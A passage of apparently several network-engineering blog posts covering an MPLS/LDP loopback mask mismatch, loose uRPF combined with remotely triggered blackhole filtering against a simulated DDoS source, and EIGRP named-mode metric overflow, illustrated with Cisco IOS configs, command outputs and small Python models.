	remote binding: lsr: 2.2.2.2:0, label: 19
  lib entry: 192.168.45.0/24, rev 18
	remote binding: lsr: 2.2.2.2:0, label: 21

The label for 2.2.2.0/24 is correctly listed as implicit-null. Have you noticed anything off by now?

P#show ip route 2.2.2.0 255.255.255.0 longer-prefixes 
<output omitted>
      2.0.0.0/32 is subnetted, 1 subnets
O        2.2.2.2 [110/2] via 192.168.23.2, 01:30:17, FastEthernet0/1
P#               
P#show mpls ldp bindings 2.2.2.0 24
  lib entry: 2.2.2.0/24, rev 28
	remote binding: lsr: 2.2.2.2:0, label: imp-null

The subnet masks do not match! OSPF ignores non-host masks on loopbacks by default and announces loopback addresses as /32. However, LDP plays by the sensible rules and distributes /24 as configured. P cannot match the prefix in the RIB to the binding in the LIB, hence the lack of an outgoing label. The fix is fairly simple if you have played with OSPF long enough:

PE1(config)#interface loopback 0
PE1(config-if)#ip ospf network point-to-point
PE2#traceroute mpls ipv4 2.2.2.0/24 source 4.4.4.4 verbose 
Tracing MPLS Label Switched Path to 2.2.2.0/24, timeout is 2 seconds

Codes: '!' - success, 'Q' - request not sent, '.' - timeout,
  'L' - labeled output interface, 'B' - unlabeled output interface, 
  'D' - DS Map mismatch, 'F' - no FEC mapping, 'f' - FEC mismatch,
  'M' - malformed request, 'm' - unsupported tlvs, 'N' - no label entry, 
  'P' - no rx intf label prot, 'p' - premature termination of LSP, 
  'R' - transit router, 'I' - unknown upstream index,
  'X' - unknown return code, 'x' - return code 0

Type escape sequence to abort.
  0 192.168.34.4 192.168.34.3 MRU 1500 [Labels: 18 Exp: 0]
L 1 192.168.34.3 192.168.23.2 MRU 1504 [Labels: implicit-null Exp: 0] 16 ms, ret code 8
! 2 192.168.23.2 40 ms, ret code 3
PE2#
PE2#show ip cef 2.2.2.2 detail                                
2.2.2.0/24, epoch 0
  local label info: global/19
  nexthop 192.168.34.3 FastEthernet1/0 label 18
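
The root cause of this story fits into a few lines of code. The sketch below assumes that a label binding is used only when its prefix is exactly the same as the prefix in the routing table, which is what the outputs above suggest; the function name and the dictionary layout are made up for the example.

```python
import ipaddress
from typing import Optional


def outgoing_label(rib_prefix: str, lib: dict) -> Optional[str]:
    """Return the remote binding whose prefix equals the RIB prefix exactly."""
    wanted = ipaddress.ip_network(rib_prefix)
    for prefix, label in lib.items():
        if ipaddress.ip_network(prefix) == wanted:
            return label
    return None   # the route stays unlabelled


# Bindings P has received from PE1 (subset of the output above)
lib_from_pe1 = {"2.2.2.0/24": "imp-null", "1.1.2.1/32": "23"}

print(outgoing_label("2.2.2.2/32", lib_from_pe1))   # OSPF advertises the loopback as /32
print(outgoing_label("2.2.2.0/24", lib_from_pe1))   # after ip ospf network point-to-point
```

The /32 in the RIB is covered by the /24 binding, but a covering prefix is not enough: the lookup only succeeds once both protocols agree on the mask.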

Story 3: once upon a time there was no loopback

Overlay VPN setups typically employ loopbacks as BGP next-hops. Besides obvious reasons like load-balancing, transport resiliency and such, there is a more stringent reason why one cannot use a physical interface as an L3VPN headend – PHP. Take our topology as an example. PE2, which reaches PE1 through P, would send packets towards 192.168.23.2 without any transport label, because P announces implicit-null for its connected route.

PE2#traceroute 192.168.23.2 source 4.4.4.4
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.3 20 msec 24 msec 12 msec
  2 192.168.23.2 8 msec 28 msec 24 msec

As a result, if it were L3VPN setup, P would receive the packet with VPN label on top, so it would either drop the packet or you might experience the most fascinating forwarding that Hogwarts can provide.
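
Here is a toy model of that failure. Everything in it is hypothetical: the VPN label 100, the transport label 17 and the contents of the LFIB on P are illustrative values, and the functions merely mimic label imposition on the ingress PE and a top-label lookup on P.

```python
IMPLICIT_NULL = "imp-null"


def impose(transport_binding, vpn_label):
    """Label stack built by the ingress PE, top of the stack first."""
    stack = [vpn_label]
    if transport_binding != IMPLICIT_NULL:
        stack.insert(0, transport_binding)   # push the transport label on top
    return stack


def p_router(lfib, stack):
    """What the P router does with the top label of a received packet."""
    return lfib.get(stack[0], "drop (no entry for label %d)" % stack[0])


VPN_LABEL = 100                                    # hypothetical label allocated by PE1
p_lfib = {17: "pop and forward to 192.168.23.2"}   # hypothetical LFIB on P

# Next-hop is a connected route on P: implicit-null, so the VPN label is exposed
print(p_router(p_lfib, impose(IMPLICIT_NULL, VPN_LABEL)))

# Next-hop has a real transport label: P pops it and PE1 sees the VPN label
print(p_router(p_lfib, impose(17, VPN_LABEL)))
```

In the first case P looks up a label it has never allocated; if it happened to use the same value for something else, the packet would be forwarded to a completely unrelated destination.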

What if you cannot use a loopback for peering? To be honest, I cannot think of a valid reason for such a case, except for some weird CCIE lab, so this is purely an abstract discussion. Anyway, you must ensure that the PE1 interface IP is not recognized by P as directly connected. Newer IOS images do install a /32 into the RIB, called a local route, but these routes are not announced by OSPF. However, OSPF does announce interface /32 addresses in the point-to-multipoint scenario:

PE1(config)#interface f0/1
PE1(config-if)#ip ospf network point-to-multipoint
P(config)#interface f0/1
P(config-if)#ip ospf network point-to-multipoint

Voila! OSPF RIB entry and LDP bindings are both created, so LSP is functional again:

P#show mpls forwarding-table 192.168.23.2 32 detail 
Local      Outgoing   Prefix           Bytes Label   Outgoing   Next Hop    
Label      Label      or Tunnel Id     Switched      interface              
17         Pop Label  192.168.23.2/32  252           Fa0/1      192.168.23.2
	MAC/Encaps=14/14, MRU=1504, Label Stack{}
	CA020BDF0006CA030BFB00068847 
	No output feature configured
PE2#traceroute 192.168.23.2 source lo 0
Type escape sequence to abort.
Tracing the route to 192.168.23.2
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.34.3 [MPLS: Label 17 Exp 0] 4 msec 16 msec 8 msec
  2 192.168.23.2 12 msec 32 msec 28 msec

Conclusion

In this article we’ve discussed several aspects of generic MPLS setup: PHP operation, loopback misconfig with OSPF, consequences of such a mischief as well as CCIE lab maniac scenario. I hope you’ve enjoyed it, so stay tuned for more!

Kudos for review: Anastasiia Kuraleva


Loose uRPF – why?

There are quite a few articles in the wild, explaining the Unicast Reverse Path Forwarding (uRPF) feature and its two modes: strict and loose. Although the operational difference between the two modes is the primary focus of such posts, they rarely cover why these two flavours exist in the first place, at least under the Google search for “loose vs strict uRPF”. Today I’d like to close such a gap and highlight the connection between loose uRPF and the yet unknown feature.

Before we start discussing the modes, a quick recap is in order. RPF is a feature from the multicast world that prevents loops in the data plane: it compares the source address of IP packet to the RIB; if the ingress interface matches the route towards the source address, packet is forwarded further, otherwise it’s a loop and the packet is discarded. Unicast RPF stems from the same idea – verify that the packet comes from a valid direction. Strict uRPF operates in the same way as its counterpart from the multicast feature set; loose uRPF, however, does not check the interface – just the availability of a valid route. There is a single notable exception to such a description though: if next-hop interface for the source address is Null0, the packet is also discarded. Cisco provides the use case for the feature as well:

To provide ISPs with a DDoS resistance tool on the ISP-to-ISP edge of a network, Unicast RPF was modified from its original strict mode implementation to check the source addresses of each ingress packet without regard for the specific interface on which it was received. This modification is known as “loose mode.”

Security Configuration Guide: Unicast Reverse Path Forwarding, Cisco IOS XE 17 (Cisco ASR 920 Routers)

Does the ISP-to-ISP DDoS protection sound familiar? It is indeed part of the Remotely Triggered Blackhole (RTBH). The destination-based RTBH uses BGP communities to notify ISP which destination is under attack, so that the ISP can temporarily drop offending traffic. Obviously, the legitimate traffic is discarded too in such a case. Wouldn’t it be better if the traffic could be dropped based on the offending source IP? This is exactly the use case for the source-based RTBH: if loose uRPF is added to the destination-based RTBH setup, attacker’s IP address can be marked by BGP community and further forwarded to the void. Here is a nice article on the RTBH that explains the solution, using IOS XR platform.

Disclaimer: there will be no extra revelations further down the text, so if you have already grasped the idea, feel free to skip the rest of the post.

Let’s build a simple topology to verify the loose uRPF within the RTBH feature:

The ISP network consists of two PE routers that use the same BGP AS. CE1 and CE2 are customer routers that peer with the ISP using eBGP. Important note: IOS XE requires that a directly connected eBGP neighbour and its prefixes are reachable via the same physical egress interface; otherwise, the received routes are considered inaccessible. The workaround is simple though: configure disable-connected-check on the PE that performs next-hop replacement. Here is the basic routing and addressing config:

CE1#show run | section interface|router|ip route
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.13.3 255.255.255.0
router bgp 3
 bgp router-id 3.3.3.3
 no bgp default ipv4-unicast
 neighbor 192.168.13.1 remote-as 12
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  neighbor 192.168.13.1 activate
  neighbor 192.168.13.1 send-community both
CE2#show run | section interface|router
interface Loopback0
 ip address 4.4.4.4 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.24.4 255.255.255.0
router bgp 4
 bgp router-id 4.4.4.4
 no bgp default ipv4-unicast
 neighbor 192.168.24.2 remote-as 12
 address-family ipv4
  network 4.4.4.4 mask 255.255.255.255
  neighbor 192.168.24.2 activate
  neighbor 192.168.24.2 send-community both
PE1#show run | section interface|router    
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.13.1 255.255.255.0
interface FastEthernet1/0
 ip address 192.168.12.1 255.255.255.0
 ip ospf 1 area 0
router ospf 1
 router-id 1.1.1.1
router bgp 12
 bgp router-id 1.1.1.1
 no bgp default ipv4-unicast
 neighbor 2.2.2.2 remote-as 12
 neighbor 2.2.2.2 update-source Loopback0
 neighbor 192.168.13.3 remote-as 3
 neighbor 192.168.13.3 disable-connected-check
 !
 address-family ipv4
  redistribute connected
  neighbor 2.2.2.2 activate
  neighbor 2.2.2.2 send-community both
  neighbor 192.168.13.3 activate
  neighbor 192.168.13.3 send-community both
PE2#show run | section interface|router
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
 ip ospf 1 area 0
interface FastEthernet0/0
 ip address 192.168.24.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.25.2 255.255.255.0
interface FastEthernet1/0
 ip address 192.168.12.2 255.255.255.0
 ip ospf 1 area 0
router ospf 1
 router-id 2.2.2.2
router bgp 12
 bgp router-id 2.2.2.2
 no bgp default ipv4-unicast
 neighbor 1.1.1.1 remote-as 12
 neighbor 1.1.1.1 update-source Loopback0
 neighbor 192.168.24.4 remote-as 4
 neighbor 192.168.25.5 remote-as 5
 !
 address-family ipv4
  redistribute connected
  neighbor 1.1.1.1 activate
  neighbor 1.1.1.1 send-community
  neighbor 192.168.24.4 activate
  neighbor 192.168.24.4 send-community both
  neighbor 192.168.25.5 activate
  neighbor 192.168.25.5 send-community both

Attacker#show run | section interface|router
interface Loopback0
 ip address 5.5.5.5 255.255.255.255
interface FastEthernet0/1
 ip address 192.168.25.5 255.255.255.0
router bgp 5
 bgp router-id 5.5.5.5
 no bgp default ipv4-unicast
 neighbor 192.168.25.2 remote-as 12
 address-family ipv4
  network 5.5.5.5 mask 255.255.255.255
  neighbor 192.168.25.2 activate
  neighbor 192.168.25.2 send-community both

First, let’s implement destination-based RTBH. Community of 12:666 would be the marker to discard the traffic through Null0.

PE1#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
 address-family ipv4
  neighbor 192.168.13.3 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
 match community RTBH
 set local-preference 200
 set ip next-hop 10.0.0.0
route-map RTBH permit 20
PE2#show run | s ip route|ip community|ip bgp|route-map|router bgp
router bgp 12
 address-family ipv4
  neighbor 192.168.24.4 route-map RTBH in
  neighbor 192.168.25.5 route-map RTBH in
ip bgp-community new-format
ip community-list standard RTBH permit 12:666
ip route 10.0.0.0 255.255.255.255 Null0
route-map RTBH permit 10
 match community RTBH
 set local-preference 200
 set ip next-hop 10.0.0.0
route-map RTBH permit 20
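
To make the route-map logic explicit, here is a minimal Python sketch of what the RTBH policy does to an incoming BGP route. The Route class and the function name are my own illustrative constructs; only the community, the local preference and the next hop come from the config above.

```python
from dataclasses import dataclass, field, replace

@dataclass(frozen=True)
class Route:
    prefix: str
    next_hop: str
    local_pref: int = 100
    communities: frozenset = field(default_factory=frozenset)

BLACKHOLE_COMMUNITY = "12:666"
BLACKHOLE_NEXT_HOP = "10.0.0.0"  # resolved by the static route to Null0

def route_map_rtbh(route):
    """Mimic 'route-map RTBH' applied inbound on a PE."""
    # Sequence 10: routes tagged with 12:666 are preferred and redirected to the void.
    if BLACKHOLE_COMMUNITY in route.communities:
        return replace(route, local_pref=200, next_hop=BLACKHOLE_NEXT_HOP)
    # Sequence 20: everything else is permitted unchanged.
    return route

tagged = route_map_rtbh(
    Route("3.3.3.3/32", "192.168.13.3", communities=frozenset({"12:666"}))
)
plain = route_map_rtbh(Route("3.3.3.3/32", "192.168.13.3"))
```

The rewritten next hop is what ties the BGP announcement to the static Null0 route: once 10.0.0.0 is the next hop, recursion ends at Null0 and the traffic is dropped.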

Attacker has initiated the DDoS attack on CE1 3.3.3.3/32:

Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 40/48/52 ms

In order to block the offending traffic, CE1 has to announce 3.3.3.3/32 with community of 12:666.

CE1#show run | section route-map|router bgp
router bgp 3
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255 route-map RTBH
route-map RTBH permit 10
 set community 12:666

The attack has ceased on PE2 due to the data plane filter:

Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
UUUUU
Success rate is 0 percent (0/5)

An important property of RTBH: traffic is discarded as early as possible, at the provider edge, which limits the impact on the ISP network.

PE2#show ip bgp 3.3.3.3/32
BGP routing table entry for 3.3.3.3/32, version 27
Paths: (1 available, best #1, table default)
  Advertised to update-groups:
     3         
  Refresh Epoch 2
  3
    10.0.0.0 from 1.1.1.1 (1.1.1.1)
      Origin IGP, metric 0, localpref 200, valid, internal, best
      Community: 12:666
PE2#
PE2#show ip cef 3.3.3.3/32 det
3.3.3.3/32, epoch 0, flags rib only nolabel, rib defined all labels
  recursive via 10.0.0.0
    attached to Null0

There is an unfortunate side effect though – CE2 has lost connectivity as well:

CE2#ping 3.3.3.3 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4 
UUUUU
Success rate is 0 percent (0/5)

Destination-based RTBH might be a good tool to limit the impact of a DDoS attack while gaining additional information about the attacker. Let’s assume that CE1 already knows the source IP address: 5.5.5.5/32. Time to introduce source-based RTBH with the addition of loose uRPF!

PE1#show run int f0/0
interface FastEthernet0/0
 ip verify unicast source reachable-via any
PE2#show run int f0/0  
interface FastEthernet0/0
 ip verify unicast source reachable-via any
PE2#show run int f0/1
interface FastEthernet0/1
 ip verify unicast source reachable-via any

ISP is set up, so let’s swap the announcements on CE1 to trigger source-based RTBH:

CE1#show run | s ip route|router bgp
router bgp 3
 address-family ipv4
  network 3.3.3.3 mask 255.255.255.255
  network 5.5.5.5 mask 255.255.255.255 route-map RTBH
ip route 5.5.5.5 255.255.255.255 Null0

ISP is filtering the traffic from attacker on the entry points to its network:

PE2#show ip bgp 5.5.5.5/32
BGP routing table entry for 5.5.5.5/32, version 29
Paths: (2 available, best #1, table default)
  Advertised to update-groups:
     3         
  Refresh Epoch 3
  3
    10.0.0.0 from 1.1.1.1 (1.1.1.1)
      Origin IGP, metric 0, localpref 200, valid, internal, best
      Community: 12:666
  Refresh Epoch 4
  5
    192.168.25.5 from 192.168.25.5 (5.5.5.5)
      Origin IGP, metric 0, localpref 100, valid, external
PE2#
PE2#show ip cef 5.5.5.5/32 det
5.5.5.5/32, epoch 0, flags rib only nolabel, rib defined all labels
  recursive via 10.0.0.0
    attached to Null0
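
The output above shows two paths for 5.5.5.5/32, and the blackhole one wins even though the other is learned directly over eBGP. A deliberately truncated Python sketch of the comparison follows; it models just two steps of the BGP decision process (higher local preference, then eBGP over iBGP) and ignores everything else, and the Path class is a hypothetical helper.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Path:
    next_hop: str
    local_pref: int
    external: bool  # True for eBGP-learned, False for iBGP-learned

def best_path(paths):
    # Higher local preference wins; eBGP over iBGP only breaks a tie here.
    return max(paths, key=lambda p: (p.local_pref, p.external))

# Values taken from 'show ip bgp 5.5.5.5/32' on PE2.
candidates = [
    Path(next_hop="10.0.0.0", local_pref=200, external=False),
    Path(next_hop="192.168.25.5", local_pref=100, external=True),
]
winner = best_path(candidates)
```

This is why the route-map sets local preference 200: without it, the attacker's own eBGP announcement would stay the best path on PE2 and the uRPF check would pass.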

This time, however, only the offending party is neutralized; valid connections are still operational:

CE2#ping 3.3.3.3 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 4.4.4.4 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 44/53/72 ms
Attacker#ping 3.3.3.3 source loopback0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 3.3.3.3, timeout is 2 seconds:
Packet sent with a source address of 5.5.5.5 
.....
Success rate is 0 percent (0/5)

In production you would probably not allow customers to announce the prefixes in such a direct way; one would rather restrict the allowed prefixes or even use a dedicated router within the ISP to generate the prefixes for RTBH. Nevertheless, the underlying idea of loose uRPF combined with a static route to Null0 stays the same, so I hope this post bridges the gap between the uRPF mode and its use case.

Kudos for review: Anastasiia Kuraleva


EIGRP named mode: migration pitfall

Let’s imagine that you’ve got an unstoppable urge to upgrade your network software to the latest available version as well as to adopt all the best practices available (you’re not looking for a new job just yet). Your first guinea pig is EIGRP in classic mode: you can’t wait to bump it to named mode because of all the shiny new features. Even better, you can do it with just a single eigrp upgrade-cli command. Couldn’t be easier, what could possibly go wrong? As you might have guessed from my previous posts, such an upgrade could wreck your network in certain circumstances.

What could be simpler than four routers? Exactly, three routers! Each of them is running EIGRP, R1 & R3 – classic mode, while R2 has just finished upgrading to named mode.

R1#show run | section router eigrp|interface
interface Loopback0
 ip address 1.1.1.1 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.1 255.255.255.0
router eigrp 1
 network 0.0.0.0
R3#show run | section router eigrp|interface
interface Loopback0
 ip address 3.3.3.3 255.255.255.255
interface FastEthernet0/1
 ip address 192.168.23.3 255.255.255.0
router eigrp 1
 network 0.0.0.0
R2#show run | section router eigrp|interface
interface Loopback0
 ip address 2.2.2.2 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
 ip address 192.168.23.2 255.255.255.0
router eigrp NAMED
 address-family ipv4 unicast autonomous-system 1
  network 0.0.0.0

As you probably expect, there is nothing criminal just yet, R3 is still able to reach R1 without hiccups:

R3#show ip route eigrp
<output omitted>
      1.0.0.0/32 is subnetted, 1 subnets
D        1.1.1.1 [90/158720] via 192.168.23.2, 00:03:32, FastEthernet0/1
      2.0.0.0/32 is subnetted, 1 subnets
D        2.2.2.2 [90/28160] via 192.168.23.2, 00:03:37, FastEthernet0/1
D     192.168.12.0/24 [90/30720] via 192.168.23.2, 00:03:37, FastEthernet0/1
R3#  
R3#ping 1.1.1.1 source lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/28/36 ms

So far so good, isn’t it? However, just as you are preparing to hit upgrade-cli on yet another router, a request comes in to deprioritize 1.1.1.1/32 for some kind of traffic engineering. You want it out of your way ASAP, so you adjust the bandwidth on the loopback:

R1(config)# interface lo0
R1(config-if)# bandwidth ?
  <1-10000000>   Bandwidth in kilobits
  inherit        Specify how bandwidth is inherited
  qos-reference  Reference bandwidth for QOS test
  receive        Specify receive-side bandwidth

R1(config-if)# bandwidth 1

KABOOM! R3 has just lost its connectivity to R1:

R3#ping 1.1.1.1 so lo 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3 
UUUUU
Success rate is 0 percent (0/5)
R3#
R3#show ip route eigrp 
<output omitted>
      1.0.0.0/32 is subnetted, 1 subnets
D        1.1.1.1 [90/2560133120] via 192.168.23.2, 00:00:56, FastEthernet0/1
      2.0.0.0/32 is subnetted, 1 subnets
D        2.2.2.2 [90/28160] via 192.168.23.2, 00:09:42, FastEthernet0/1
D     192.168.12.0/24 [90/30720] via 192.168.23.2, 00:09:42, FastEthernet0/1

EIGRP must be the culprit; however, the route is still in the RIB, with a worse metric as expected.
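
The two metric values seen on R3 can be reproduced with the classic EIGRP formula and default K values (K1=K3=1). The sketch below assumes the usual IOS interface defaults, which are not shown in the configs: 100000 Kbit bandwidth and 100 microseconds of delay on FastEthernet, 5000 microseconds of delay on the loopback.

```python
def classic_metric(min_bandwidth_kbps, total_delay_us, k1=1, k3=1):
    """Classic (32-bit) EIGRP composite metric with K2=K4=K5=0."""
    scaled_bandwidth = 10**7 // min_bandwidth_kbps   # inverse of the slowest link
    scaled_delay = total_delay_us // 10              # delay in tens of microseconds
    return 256 * (k1 * scaled_bandwidth + k3 * scaled_delay)

FAST_ETHERNET_KBPS = 100_000          # assumed interface default
PATH_DELAY_US = 5000 + 100 + 100      # loopback + two FastEthernet hops (assumed defaults)

before = classic_metric(FAST_ETHERNET_KBPS, PATH_DELAY_US)  # slowest link is FastEthernet
after = classic_metric(1, PATH_DELAY_US)                    # loopback set to 1 Kbit
print(before, after)  # 158720 2560133120
```

Both numbers match the R3 routing table before and after the bandwidth change, so from the classic-mode point of view nothing is out of the ordinary.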

R3#traceroute 1.1.1.1 source lo0 numeric 
Type escape sequence to abort.
Tracing the route to 1.1.1.1
VRF info: (vrf in name/id, vrf out name/id)
  1 192.168.23.2 12 msec 16 msec 16 msec
  2 192.168.23.2 !H  !H  !H

R2, on the other hand, ignores your efforts to squeeze the traffic through it, because…

R2#show ip route eigrp
<output omitted>
      3.0.0.0/32 is subnetted, 1 subnets
D        3.3.3.3 [90/2662400] via 192.168.23.3, 00:14:07, FastEthernet0/1

It has lost the route!

However, the loss is not as complete as it may look. The prefix is still in the EIGRP topology table with perfectly valid metrics:

R2#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 VR(NAMED) Topology Entry for AS(1)/ID(2.2.2.2) for 1.1.1.1/32
  State is Passive, Query origin flag is 1, 0 Successor(s), FD is Infinity, RIB is 4294967295
  Descriptor Blocks:
  192.168.12.1 (FastEthernet0/0), from 192.168.12.1, Send flag is 0x0
      Composite metric is (655694233600/655687680000), route is Internal
      Vector metric:
        Minimum bandwidth is 1 Kbit
        Total delay is 5100000000 picoseconds
        Reliability is 255/255
        Load is 1/255
        Minimum MTU is 1500
        Hop count is 1
        Originating router is 1.1.1.1
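
For reference, the composite metric in this output can be recomputed from the vector metric. The sketch below uses the wide metric formula as I understand it from RFC 7868, with only K1 and K3 set to 1 and the remaining K values left at zero; the function name is mine.

```python
def wide_metric(min_bandwidth_kbps, total_delay_ps, k1=1, k3=1):
    """64-bit EIGRP composite metric with K2=K4=K5=K6=0."""
    throughput = (10**7 * 65536) // min_bandwidth_kbps   # scaled inverse bandwidth
    latency = (total_delay_ps * 65536) // 10**6          # scaled delay
    return k1 * throughput + k3 * latency

# Values from 'show ip eigrp topology 1.1.1.1/32' on R2.
computed_distance = wide_metric(1, 5_100_000_000)
# Reported distance from R1: same bandwidth, loopback delay only (assumed 5000 microseconds).
reported_distance = wide_metric(1, 5_000_000_000)
print(computed_distance, reported_distance)  # 655694233600 655687680000
```

The throughput term alone is 655360000000 for a 1 Kbit link, which is what pushes the composite metric far beyond 32 bits.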

The data seems to be in order. So far we’ve got two mysteries on our hands:

  1. Why has R2 lost its route?
  2. Why has R3 NOT lost its route?

The first question directly affects availability, so we tackle this one first. Notice anything unusual about the EIGRP metric? It is far greater than the 4294967295 shown in “RIB is 4294967295”, which is the upper bound of the 32-bit RIB metric. EIGRP cannot squeeze its 64-bit wide metric into the 32-bit RIB metric, so the route is not installed. Solution? Scale down the EIGRP metric before putting it into the RIB by using metric rib-scale, which is equal to 128 by default:

R2#show ip protocols 
Routing Protocol is "eigrp 1"
  Outgoing update filter list for all interfaces is not set
  Incoming update filter list for all interfaces is not set
  Default networks flagged in outgoing updates
  Default networks accepted from incoming updates
  EIGRP-IPv4 VR(NAMED) Address-Family Protocol for AS(1)
    Metric weight K1=1, K2=0, K3=1, K4=0, K5=0 K6=0
    Metric rib-scale 128
    Metric version 64bit
    NSF-aware route hold timer is 240
    Router-ID: 2.2.2.2
    Topology : 0 (base) 
      Active Timer: 3 min
      Distance: internal 90 external 170
      Maximum path: 4
      Maximum hopcount 100
      Maximum metric variance 1
      Total Prefix Count: 5
      Total Redist Count: 0

  Automatic Summarization: disabled
  Maximum path: 4
  Routing for Networks:
    0.0.0.0
  Routing Information Sources:
    Gateway         Distance      Last Update
    192.168.12.1          90      00:17:36
    192.168.23.3          90      00:17:36
  Distance: internal 90 external 170

Guess what? 128 is still not enough to bring 655694233600 down to a 32-bit number; 160 seems to do the trick though:

R2(config)#router eigrp NAMED  
R2(config-router)#address-family ipv4 autonomous-system 1
R2(config-router-af)#metric rib-scale 160
R2#show ip route eigrp 
<output omitted>
      1.0.0.0/32 is subnetted, 1 subnets
D        1.1.1.1 [90/4098088960] via 192.168.12.1, 00:00:49, FastEthernet0/0
      3.0.0.0/32 is subnetted, 1 subnets
D        3.3.3.3 [90/2129920] via 192.168.23.3, 00:00:49, FastEthernet0/1
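
The arithmetic behind the rib-scale value is easy to check. This is a sketch under two assumptions of mine: the RIB metric is the wide metric integer-divided by rib-scale, and 4294967295 itself means “not installable”. The upper bound of 255 for the scale is also an assumption about the accepted range.

```python
RIB_UNREACHABLE = 2**32 - 1  # 4294967295, as shown in "RIB is 4294967295"

def rib_metric(wide_metric, rib_scale):
    """Scale the 64-bit EIGRP metric down for the RIB."""
    return wide_metric // rib_scale

def installable(wide_metric, rib_scale):
    """True if the scaled metric fits below the 32-bit ceiling."""
    return rib_metric(wide_metric, rib_scale) < RIB_UNREACHABLE

def smallest_rib_scale(wide_metric, max_scale=255):
    """Smallest scale that makes the route installable, or None."""
    for scale in range(1, max_scale + 1):
        if installable(wide_metric, scale):
            return scale
    return None

METRIC = 655694233600
print(rib_metric(METRIC, 128))     # 5122611200, does not fit
print(rib_metric(METRIC, 160))     # 4098088960, matches the RIB entry above
print(smallest_rib_scale(METRIC))  # 153
```

So 160 is not a magic number: under these assumptions anything from 153 upwards would bring this particular prefix back, at the cost of coarser metrics for every other route.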

R3 is able to reach 1.1.1.1/32 again as well:

R3#ping 1.1.1.1 so lo 0                  
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 1.1.1.1, timeout is 2 seconds:
Packet sent with a source address of 3.3.3.3 
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 20/32/52 ms

So, the first mystery is declassified now. What about the second one: why on earth did R3 retain the route after R2 stopped using it? It’s not an idle question: such behaviour is bound to confuse a troubleshooting engineer, who is led to believe that routing is still intact, since the proper route is installed in the RIB.

When an EIGRP router loses all of its successor routes and has no feasible successor, it starts the diffusing computation of DUAL, exchanging Query and Reply messages with its neighbours. Our case is not an exception, so let’s walk through the process between R2 and R3:

  1. R2 loses the successor for 1.1.1.1/32, because it receives Query from R1, so R2 sends the Query of its own towards R3.

Notice the metric: delay corresponds to the actual value on R2 instead of Infinity constant.

  2. R3 updates its topology with the received metric components:
R3#show ip eigrp topology 1.1.1.1/32
EIGRP-IPv4 Topology Entry for AS(1)/ID(3.3.3.3) for 1.1.1.1/32
  State is Passive, Query origin flag is 1, 1 Successor(s), FD is 2560133120
  Descriptor Blocks:
  192.168.23.2 (FastEthernet0/1), from 192.168.23.2, Send flag is 0x0
      Composite metric is (2560133120/2560130560), route is Internal
      Vector metric:
        Minimum bandwidth is 1 Kbit
        Total delay is 5200 microseconds
        Reliability is 255/255
        Load is 1/255
        Minimum MTU is 1500
        Hop count is 2
        Originating router is 1.1.1.1

Since R3 has no alternatives to R2 and thus no possible EIGRP neighbours to query further, it responds back with the Infinity metric due to split horizon rule:

  3. R2 receives all Reply to outstanding Query, so it is able to select the loop-free route. The only available one cannot squeeze into RIB, so R2 is left with no route.

Fun fact: if you flap RIB scale config so that R2 loses the existing route, Query from R2 indicates route loss properly:

The reason for such a different processing seems to be simple: the initial Query is triggered by the Query from successor R1 before RIB update is attempted (no reason to specify Infinity metric); the second Query is performed after proper route loss from RIB perspective. The initial Query cannot trigger RIB update because routing information has to be updated via DUAL first. I reckon there could be two solutions to that:

  1. either send Update with Infinity metric after the route fails to be installed in RIB
    or
  2. always send Query with Infinity metric (which is the approach in EIGRP RFC).

Is it a likely failure scenario? Not really, modern networks make it difficult to end up with a metric high enough to get an out-of-bounds value. However, it’s still a valid scenario, especially in case of lousy metric engineering. The prevention is well-known – pilot testing and maintenance windows with automated predefined checks.


EIGRP SIA – why?

It’s very likely that you already know what EIGRP stuck-in-active (SIA) feature means. Just a quick recap: if a router does not get a Reply message for previously sent Query within Active timer (3 minutes by default), it tears down the adjacency with the “stuck” neighbour; in the meantime the router probes its neighbours with SIA-Query, resetting Active timer if there is SIA-Reply from the neighbour. Sounds simple, right? Just another failsafe to protect network from a router that might go haywire. Let me ask you a long multi-question though:

Why is SIA required, to the point that there is no way to disable it? Isn’t it enough to expire the Holddown timer on the stuck neighbour and consider its Reply unnecessary?

Well, the answer really depends on the viewpoint (Cisco’s “it depends”, uh-huh). Let’s look at an example:

